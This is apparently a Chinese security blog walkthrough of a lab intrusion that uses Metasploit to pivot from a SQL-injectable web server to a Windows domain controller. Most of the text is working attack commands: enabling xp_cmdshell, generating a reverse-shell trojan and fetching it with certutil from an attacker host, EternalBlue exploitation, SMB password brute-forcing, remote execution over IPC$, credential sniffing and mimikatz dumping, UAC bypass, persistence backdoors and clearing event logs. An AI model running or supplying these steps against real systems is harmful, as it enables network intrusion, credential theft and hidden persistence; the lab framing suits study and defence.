Metasploit-纵深域控

本文作者: 重生信安 - 鲨鱼

                        实验拓扑图

                    0x02 入侵1号机

1号机模拟外网web应用，找到注入点

判断为整形盲注，直接sqlmap跑一下权限.

Sqlserver 2008数据库sa权限,2008数据库默认禁用xp_cmdshell，需要手动开启。

EXEC sp_configure 'show advanced options',1//允许修改高级参数

RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1  //打开xp_cmdshell扩展

RECONFIGURE

开启后直接从注入点利用xp_cmdshell，执行系统命令添加账户等操作。我这里选择远程下载木马，运行木马对系统进行控制。生成木马并把木马放在192.168.31.135 web上提供下载。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.45 lport=4444 -f exe > /home/1.exe //生成msf木马文件

certutil -urlcache -split -f http://192.168.31.135/test.exe c:\1.exe //远程下载木马程序

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 本机ip

set lport 本机监听端口

run

再通过xp_cmdshell执行木马。

接收到shell，getuid 查看当前用户权限，shell  进入交互式shell，目标不在此主机，继续进行纵深。

background //挂起会话

route add 目标网段 子掩码  session号 //添加一条路由去往目标内网；

                      0x03 入侵2号机

通过路由转发对目标内网ms17-010漏洞主机进行探测。

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.192.1/24

set threads 50

Run

发现一台存在ms17-010 漏洞主机2号机，并设置exp进行攻击。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.31.45

set lport 6666

set rhosts 192.168.192.135

Run

通过远程溢出拿下2号机，添加用户开启3389，3389端口转发。

run getgui -e //开启3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.135//将192.135主机3389转发本机111

rdesktop -u 账号  -p 密码    本机ip:端口    // 远程连接

可以再添加一条路由继续进行扫描扩大战果。

                    0x04 入侵3号机

通过路由转发继续扫描脆弱主机，smb弱口令

use auxiliary/scanner/smb/smb_login

set rhosts 192.168.192.1/24

set user_file /home/1.txt

set pass_file /home/2.txt

set threads 50

Run

192.168.192.129 弱口令 administrator 123456，目标主机未开启3389，利用ipc入侵，回到2号机shell会话上 session -i 2 shell进入交互会话。

net use \\192.168.192.129 "123456" /user:"administrator" //建立ipc连接

copy c:\\1.exe \\192.168.192.129\c$    //将本地c盘1.exe 拷贝到目标c盘

net time \\192.168.192.129    //查看目标时间

at \\192.168.192.129 23:59 c:\\1.exe  // 根据时间添加事件，时间一到执行木马

kali设置好监听等待木马执行，反弹shell。

                    0x05 入侵4号机

利用3号机反弹的shell进行arp嗅探。

load sniffer //加载嗅探模板

sniffer_interfaces //列出主机网卡

sniffer_start [数值]  //开启监听

sniffer_dump 2 1.cap //导出监听到的数据为1.cap

用户登陆ftp，会被嗅探到明文密码。

解cap嗅探包。

use auxiliary/sniffer/psnuffle

set pcapfile 1.cap

run

得到ftp明文木马，然后远程到一台主机通过ftp上传webshell 大马。

进入大马，找到可读写目录上传木马。

kali设置好监听等待木马执行。

执行并接收，权限很低利用getsystem提权失败。

进入shell，systeminfo命令查看已打的补丁，发现可以用ms15-051进行提权。

search ms15 // 搜索ms15

额。。。。。好像提权失败了，换思路先绕过UAC.

use exploit/windows/local/bypassuac

set session 4

Run

返回一个新的shell,进入返回的新shell，直接getsystem进行提权。

提权成功，接下来读取明文密码。

run hashdump //读取用户密码hash

读取失败了，但是不要着急我们把shell注入到一个实体system进程中。

ps  //查看所有进程

migrate 1076  //将shell迁移到 1076 线程当中

load mimikatz  //加载mimikatz

msv  //读取用户明文（hash）

拿到域管理用户hash密码，去破解一下。

              0x06 拿下域控制器5号机

有了域控账户密码可以在域里面畅通无阻，继续用ipc拿下域控制器。

利用域管理员账号密码进行ipc入侵，kali设置监听得到反弹shell。

run getgui -e //开启3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.132

rdesktop -u administrator@guguyu.com -p P@ssw0rd 192.168.2.68:1111

成功拿下域控制器！

run persistence -X -i 5 -p 4444 -r 192.168.192.132 //向注册表写入后门文件 开机自启 每5秒反弹一次shell

run metsvc //在主机上创建一个监听31337端口的后门服务

clearev 清理痕迹。

不足之处，还请各位大佬多多指点！！！！